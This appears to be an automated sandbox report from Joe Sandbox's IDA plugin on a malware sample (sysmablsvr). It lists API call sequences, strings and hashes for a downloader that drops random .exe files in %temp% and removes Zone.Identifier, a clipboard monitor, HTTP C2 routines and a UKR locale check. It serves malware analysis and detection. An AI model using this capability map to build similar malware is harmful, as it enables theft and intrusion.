                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Opcode Fuzzy Hash: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              • %temp%, xrefs: 0040F09B
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: 1100962fa89ef17564c5c36be3cff2d1b1833b9d6adaa76289525fa13b6591b5
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Opcode Fuzzy Hash: 1100962fa89ef17564c5c36be3cff2d1b1833b9d6adaa76289525fa13b6591b5
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Opcode Fuzzy Hash: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Opcode Fuzzy Hash: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54

                                              Control-flow Graph

                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                              • SetClipboardViewer.USER32(?), ref: 00405968
                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                              • OpenClipboard.USER32(00000000), ref: 00405A17
                                              • GetClipboardData.USER32(00000000), ref: 00405A29
                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                              • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                              • String ID:
                                              • API String ID: 3549449529-0
                                              • Opcode ID: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction ID: 140c23de002baebc09e84a4b6840f2c6f62578de50faf7348504d1cb8e8204ab
                                              • Opcode Fuzzy Hash: ce536a5ebd17aa25bd8c63565adcaae9255b97c75774932fd7b0e60d3253294e
                                              • Instruction Fuzzy Hash: 80710C75A00608EFDF14DFA4D988BAFB7B4EB48300F10856AE506B7290D7799A40CF69

                                              Control-flow Graph

                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                              • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                              • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                              • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                              • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                              • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                              • WSACloseEvent.WS2_32(?), ref: 00401715
                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                              • String ID: PCOI$ilci
                                              • API String ID: 2403999931-3762367603
                                              • Opcode ID: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction ID: 5b8540bf1bb466d15bf787bf2847de779fcfe5b3cc035b7f1a74ac98c73710f1
                                              • Opcode Fuzzy Hash: af844558824ef2f0cd234010a78707101b1275eb600f87e7949f258bb1116b4d
                                              • Instruction Fuzzy Hash: D731A875900705ABC710EF70EC48B97B7B8BF08710F048A2AF559A3691C779F894CB98

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 00405838
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00405850
                                              • Sleep.KERNEL32(00000001), ref: 00405864
                                              • GetTickCount.KERNEL32 ref: 0040586A
                                              • GetTickCount.KERNEL32 ref: 00405873
                                              • wsprintfW.USER32 ref: 00405886
                                              • RegisterClassExW.USER32(00000030), ref: 00405893
                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004058BC
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004058D7
                                              • TranslateMessage.USER32(?), ref: 004058E5
                                              • DispatchMessageA.USER32(?), ref: 004058EF
                                              • ExitThread.KERNEL32 ref: 00405901
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                              • String ID: %x%X$0
                                              • API String ID: 716646876-225668902
                                              • Opcode ID: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Opcode Fuzzy Hash: 0ae848275c23e009fdd4c42bfca4f986060bd914b3fa7c2793bcea76a610d9bf
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Opcode Fuzzy Hash: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNEL32(000003E8), ref: 00406B5E
                                              • GetModuleFileNameW.KERNEL32(00000000,00417500,00000104), ref: 00406B70
                                                • Part of subcall function 0040ED00: CreateFileW.KERNEL32(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040ED20
                                                • Part of subcall function 0040ED00: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040ED35
                                                • Part of subcall function 0040ED00: CloseHandle.KERNEL32(000000FF), ref: 0040ED42
                                              • ExitThread.KERNEL32 ref: 00406CDA
                                                • Part of subcall function 00406340: GetLogicalDrives.KERNEL32 ref: 00406346
                                                • Part of subcall function 00406340: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                • Part of subcall function 00406340: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                • Part of subcall function 00406340: RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              • Sleep.KERNEL32(000007D0), ref: 00406CCD
                                                • Part of subcall function 00406260: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 004062B3
                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C0F
                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C24
                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406C3F
                                              • wsprintfW.USER32 ref: 00406C52
                                              • wsprintfW.USER32 ref: 00406C72
                                              • wsprintfW.USER32 ref: 00406C95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                              • String ID: (%dGB)$%s%s$Unnamed volume
                                              • API String ID: 1650488544-2117135753
                                              • Opcode ID: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction ID: 6971fabc066a78c2b5f4f93c2536245faf55c75ef939042e540841f18162a7fc
                                              • Opcode Fuzzy Hash: 28cf1d750f559b85cf67cfd50a9e6b26b5fb1b314e0712f8dd8363f24fb25f9f
                                              • Instruction Fuzzy Hash: 1D419BB1900214BBE714DB94DD55FEE7778BB48700F1081A5F20AB61D0DA785794CF6A

                                              Control-flow Graph

                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
